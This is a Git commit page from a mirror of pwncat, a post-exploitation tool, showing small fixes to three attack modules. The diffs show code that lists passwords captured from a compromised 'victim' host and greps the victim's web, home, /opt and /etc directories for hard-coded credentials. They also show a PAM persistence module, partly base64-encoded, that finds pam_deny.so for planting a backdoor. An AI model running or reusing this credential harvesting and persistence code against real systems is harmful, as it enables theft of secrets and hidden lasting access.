Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00
Code Projects Releases Wiki Activity

Fixed password config and enumeration

Browse Source
This commit is contained in:
Caleb Stewart 2020-06-04 03:34:21 -04:00
parent d3ac61c0f8
commit 528088be77
3 changed files with 9 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
pwncat/commands/set.py
View File

@ -36,10 +36,10 @@ class Command(CommandDefinition):
if args.password: if args.password:
if args.variable is None: if args.variable is None:
found = False found = False
for user, props in pwncat.victim.users.items(): for name, user in pwncat.victim.users.items():
if "password" in props and props["password"] is not None: if user.password is not None:
print( print(
f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(props['password'])}{Fore.RESET}" f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(user.password)}{Fore.RESET}"
) )
found = True found = True
if not found: if not found:
@ -50,7 +50,7 @@ class Command(CommandDefinition):
print( print(
f" - {Fore.GREEN}{args.variable}{Fore.RESET} -> {Fore.RED}{repr(args.value)}{Fore.RESET}" f" - {Fore.GREEN}{args.variable}{Fore.RESET} -> {Fore.RED}{repr(args.value)}{Fore.RESET}"
) )
pwncat.victim.users[args.variable]["password"] = args.value pwncat.victim.users[args.variable].password = args.value
else: else:
if ( if (
args.variable is not None args.variable is not None

4
pwncat/enumerate/passwords.py
View File

@ -52,13 +52,13 @@ def enumerate() -> Generator[FactData, None, None]:
locations = ["/var/www", "$HOME", "/opt", "/etc"] locations = ["/var/www", "$HOME", "/opt", "/etc"]
# The types of files which are "code". This means that we only recognize the # The types of files which are "code". This means that we only recognize the
# actual password if it is a literal value (enclosed in single or double quotes) # actual password if it is a literal value (enclosed in single or double quotes)
code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini"] code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini", ".json"]
grep = pwncat.victim.which("grep") grep = pwncat.victim.which("grep")
if grep is None: if grep is None:
return return
command = f"{grep} -InRiE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null" command = f"{grep} -InriE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"
with pwncat.victim.subprocess(command, "r") as filp: with pwncat.victim.subprocess(command, "r") as filp:
for line in filp: for line in filp:
line = line.decode("utf-8").strip().split(":") line = line.decode("utf-8").strip().split(":")

4
pwncat/persist/pam.py
View File

@ -114,7 +114,9 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg==
pam_modules = "/usr/lib/security" pam_modules = "/usr/lib/security"
try: try:
results = ( results = (
pwncat.victim.env(["find", "/", "-name", "pam_deny.so"]) pwncat.victim.run(
"find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
)
.strip() .strip()
.decode("utf-8") .decode("utf-8")
) )